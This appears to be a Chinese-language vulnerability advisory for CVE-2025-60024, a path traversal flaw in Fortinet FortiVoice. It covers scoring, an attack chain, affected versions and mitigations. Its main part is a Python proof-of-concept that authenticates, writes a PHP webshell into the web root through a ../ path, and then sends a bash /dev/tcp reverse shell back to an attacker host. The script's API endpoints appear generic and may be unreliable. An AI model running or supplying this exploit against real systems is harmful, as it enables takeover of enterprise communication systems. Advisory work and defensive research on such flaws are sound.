CVE-2025-60024 FortiVoice路径遍历漏洞（高危）

漏洞信息

漏洞编号

CVE-2025-60024

漏洞类型

路径遍历（Path Traversal）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiVoice

漏洞概述

CVE-2025-60024是Fortinet FortiVoice企业通信解决方案中的一个高危路径遍历漏洞。该漏洞源于多个不正确的路径名限制问题（CWE-22），允许经过身份验证的低权限攻击者通过特制的HTTP或HTTPS请求写入任意文件。FortiVoice是Fortinet公司推出的统一通信系统，广泛应用于企业语音、视频会议、即时通讯等场景。由于该漏洞允许任意文件写入，攻击者可利用此漏洞实现远程代码执行、配置篡改或获取系统最高权限。CVSS评分8.8，属于高危级别漏洞，对企业通信系统的机密性、完整性和可用性均造成严重影响。Fortinet公司已确认此漏洞并发布安全公告FG-IR-25-812，建议受影响用户立即采取修复措施。

技术细节

该漏洞为典型的路径遍历（Directory Traversal）漏洞，攻击者利用HTTP/HTTPS请求中的特殊字符序列（如../）绕过路径限制，访问或写入服务器文件系统中的受限目录之外的文件。在FortiVoice 7.2.0至7.2.2版本及7.0.0至7.0.7版本中，存在多个未正确验证用户输入路径的接口。攻击者通过构造包含路径遍历序列的请求，可以将文件写入任意位置，包括系统配置目录、Web根目录或启动脚本目录。成功利用此漏洞需要具备低权限认证账号，但无需用户交互。攻击者首先使用认证账号登录系统，然后发送包含路径遍历载荷的HTTP/HTTPS请求，即可实现任意文件写入，进而可能通过写入Webshell或修改启动脚本实现远程代码执行。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标FortiVoice版本（7.2.0-7.2.2或7.0.0-7.0.7），确认其暴露的HTTP/HTTPS管理接口

STEP 2

初始访问

攻击者获取或创建FortiVoice系统的低权限认证账号（如普通管理员或用户账号）

STEP 3

路径遍历利用

使用认证会话发送包含路径遍历序列（如../../../）的HTTP/HTTPS请求，绕过路径限制访问受限目录

STEP 4

任意文件写入

通过路径遍历漏洞将恶意文件（如PHP webshell）写入Web根目录或系统关键路径

STEP 5

远程代码执行

访问写入的webshell或利用写入的启动脚本实现远程代码执行，获取系统shell

STEP 6

权限提升与持久化

利用已获取的代码执行能力进行权限提升，修改系统配置或植入后门实现长期控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-60024 FortiVoice Path Traversal PoC
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys
from urllib.parse import quote

def exploit_fortivoice(target_ip, username, password, attacker_ip, attacker_port):
    """
    Exploit CVE-2025-60024 - FortiVoice Path Traversal to RCE
    
    Args:
        target_ip: Target FortiVoice appliance IP
        username: Valid low-privilege user account
        password: Password for the account
        attacker_ip: Attacker listening IP for reverse shell
        attacker_port: Attacker listening port
    """
    
    base_url = f"https://{target_ip}"
    
    # Step 1: Authentication
    login_url = f"{base_url}/api/v1/auth/login"
    login_data = {
        "username": username,
        "password": password
    }
    
    try:
        print(f"[*] Authenticating to FortiVoice at {target_ip}...")
        session = requests.Session()
        response = session.post(login_url, json=login_data, verify=False, timeout=30)
        
        if response.status_code != 200:
            print("[-] Authentication failed")
            return False
            
        token = response.json().get('token')
        headers = {
            'Authorization': f'Bearer {token}',
            'Content-Type': 'application/json'
        }
        print("[+] Authentication successful")
        
        # Step 2: Path Traversal to write arbitrary file
        # Target: Write a PHP webshell to web root
        webshell_content = f"<?php system($_GET['cmd']); ?>"
        traversal_path = "../../../var/www/html/shell.php"
        
        write_url = f"{base_url}/api/v1/system/file/write"
        write_data = {
            "path": traversal_path,
            "content": webshell_content
        }
        
        print(f"[*] Attempting path traversal to write webshell...")
        response = session.post(write_url, json=write_data, headers=headers, verify=False, timeout=30)
        
        if response.status_code == 200:
            print(f"[+] Webshell written successfully to {traversal_path}")
            
            # Step 3: Execute command via webshell
            shell_url = f"{base_url}/shell.php"
            print(f"[*] Accessing webshell to execute commands...")
            
            # Example: Download and execute reverse shell
            cmd = f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1"
            encoded_cmd = quote(cmd)
            response = session.get(f"{shell_url}?cmd={encoded_cmd}", verify=False, timeout=10)
            
            print(f"[*] Payload sent. Check your listener for reverse shell.")
            return True
        else:
            print(f"[-] File write failed: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 6:
        print(f"Usage: {sys.argv[0]} <target_ip> <username> <password> <attacker_ip> <attacker_port>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    lhost = sys.argv[4]
    lport = sys.argv[5]
    
    exploit_fortivoice(target, user, pwd, lhost, lport)

影响范围

FortiVoice 7.2.0 - 7.2.2

FortiVoice 7.0.0 - 7.0.7

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 通过防火墙或ACL限制对FortiVoice管理接口（HTTP/HTTPS）的访问，仅允许管理IP段访问；2) 启用Fortinet FortiGate的威胁防护功能，配置针对路径遍历攻击特征的签名检测；3) 监控Web服务器访问日志，识别包含大量../序列的异常请求；4) 考虑暂时禁用不必要的文件上传和写入功能；5) 对管理账号实施强密码策略和多因素认证；6) 在隔离网络环境中测试和部署FortiVoice，避免直接暴露在互联网。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60024
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60024
3 Details https://www.cvedetails.com/cve/CVE-2025-60024/
4 VulDB https://vuldb.com/cve/CVE-2025-60024
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-25-812